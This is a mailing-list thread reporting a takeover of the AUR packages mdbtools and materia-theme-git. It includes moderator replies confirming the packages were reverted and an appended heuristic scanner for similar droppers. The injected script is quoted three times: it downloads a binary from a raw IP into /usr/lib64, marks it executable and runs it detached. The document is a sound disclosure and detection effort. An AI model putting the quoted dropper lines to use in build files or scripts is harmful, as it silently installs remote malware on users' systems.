AUR Packages Hijacked: mdbtools / materia-theme-git
Original post: https://bbs.archlinux.org/viewtopic.php?pid=2270179

-----

I've noticed these two packages being "hijacked": mdbtools and materia-theme-git

Both under the same user "koolpp"

The new versions uploaded refer to a shell script available at a Codeberg repository:

https://codeberg.org/koolpp/mdbtools/src/branch/main/src/util/Makefile.am
https://codeberg.org/koolpp/materia-theme/src/branch/main/src/gtk-4.0/meson....

The scripts execute the following:

```sh
#!/bin/sh
mkdir -p /usr/lib64
curl -s http://45.94.31.147/prod.bin -o /usr/lib64/libkwrk.so.1.5.3
chmod +x /usr/lib64/libkwrk.so.1.5.3
setsid /usr/lib64/libkwrk.so.1.5.3 &
```

Looks like a remote file will create a background session with execute permissions if you install these packages.

May these new packages versions be taken down
Hey GlassTree,

On 25/10/29 10:43AM, GlassTree wrote:
> Original post: https://bbs.archlinux.org/viewtopic.php?pid=2270179
> -----
> I've noticed these two packages being "hijacked": mdbtools and materia-theme-git
> Both under the same user "koolpp"

Thanks for noticing this takeover and letting us know, both packages have been reverted by another moderator to the pre-takeover state a few minutes ago and the offending account has been banned.

> The new versions uploaded refer to a shell script available at a Codeberg repository:
> https://codeberg.org/koolpp/mdbtools/src/branch/main/src/util/Makefile.am
> https://codeberg.org/koolpp/materia-theme/src/branch/main/src/gtk-4.0/meson....
> The scripts execute the following:
> ```sh
> #!/bin/sh
> mkdir -p /usr/lib64
> curl -s http://45.94.31.147/prod.bin -o /usr/lib64/libkwrk.so.1.5.3
> chmod +x /usr/lib64/libkwrk.so.1.5.3
> setsid /usr/lib64/libkwrk.so.1.5.3 &
> ```
> Looks like a remote file will create a background session with execute permissions if you install these packages.
> May these new packages versions be taken down
If someone trustworthy with a track record of maintaining AUR packages wants to take care of these packages (especially the more popular mdbtools) please let us know in an orphan request.

Cheers and have a nice day!
Chris
Hi,

On 10/29/25 10:43, GlassTree wrote:
> Original post: https://bbs.archlinux.org/viewtopic.php?pid=2270179
> -----
> I've noticed these two packages being "hijacked": mdbtools and materia-theme-git
> Both under the same user "koolpp"
> The new versions uploaded refer to a shell script available at a Codeberg repository:
> https://codeberg.org/koolpp/mdbtools/src/branch/main/src/util/Makefile.am
> https://codeberg.org/koolpp/materia-theme/src/branch/main/src/gtk-4.0/meson....

I reported this to codeberg moderation team earlier and the repos have been taken down now as well!

> The scripts execute the following:
> ```sh
> #!/bin/sh
> mkdir -p /usr/lib64
> curl -s http://45.94.31.147/prod.bin -o /usr/lib64/libkwrk.so.1.5.3
> chmod +x /usr/lib64/libkwrk.so.1.5.3
> setsid /usr/lib64/libkwrk.so.1.5.3 &
> ```
> Looks like a remote file will create a background session with execute permissions if you install these packages.
> May these new packages versions be taken down

Marcus
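
A review-time check built from the four traits of the script quoted in this thread, as an added example that is not part of any message here. The function names (`has`, `score_file`, `scan_tree`), the regular expressions and the default threshold of 2 are assumptions chosen for illustration; it is meant to be pointed at a source tree fetched for review before any build step runs.

```shell
#!/bin/sh
# Added example, not from the thread: heuristic scan of a fetched source tree
# for the four traits of the dropper quoted above. Patterns are assumptions.

# has PATTERN FILE: true if FILE contains a line matching the ERE.
has() { grep -Eq -e "$1" "$2"; }

# score_file FILE: print how many of the four traits FILE shows (0-4).
score_file() {
    score=0
    # 1. curl/wget download from a bare IPv4 address instead of a hostname
    has '(curl|wget)[^|;&]*https?://[0-9]{1,3}(\.[0-9]{1,3}){3}' "$1" && score=$((score + 1))
    # 2. download or redirect written straight into a system library directory
    has '(-o|>)[[:space:]]*/usr/lib(64)?/' "$1" && score=$((score + 1))
    # 3. execute bit set on a file under /usr/lib*
    has 'chmod[[:space:]]+(\+x|[0-7]{3,4})[[:space:]]+/usr/lib' "$1" && score=$((score + 1))
    # 4. absolute path launched detached from the build's session
    has '(setsid|nohup)[[:space:]]+/' "$1" && score=$((score + 1))
    echo "$score"
}

# scan_tree DIR [THRESHOLD]: print "score path" for files at or above THRESHOLD.
scan_tree() {
    find "$1" -type f | while IFS= read -r file; do
        s=$(score_file "$file")
        if [ "$s" -ge "${2:-2}" ]; then echo "$s $file"; fi
    done
}

# Stand-alone use: sh scan.sh path/to/source/tree
if [ "$#" -gt 0 ]; then scan_tree "$@"; fi
```

A single trait is common in legitimate build files, which is why files are reported only when several traits coincide; empty output means nothing reached the threshold, not that the tree is clean.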
participants (3)
- Christian Heusel
- GlassTree
- Marcus Hoffmann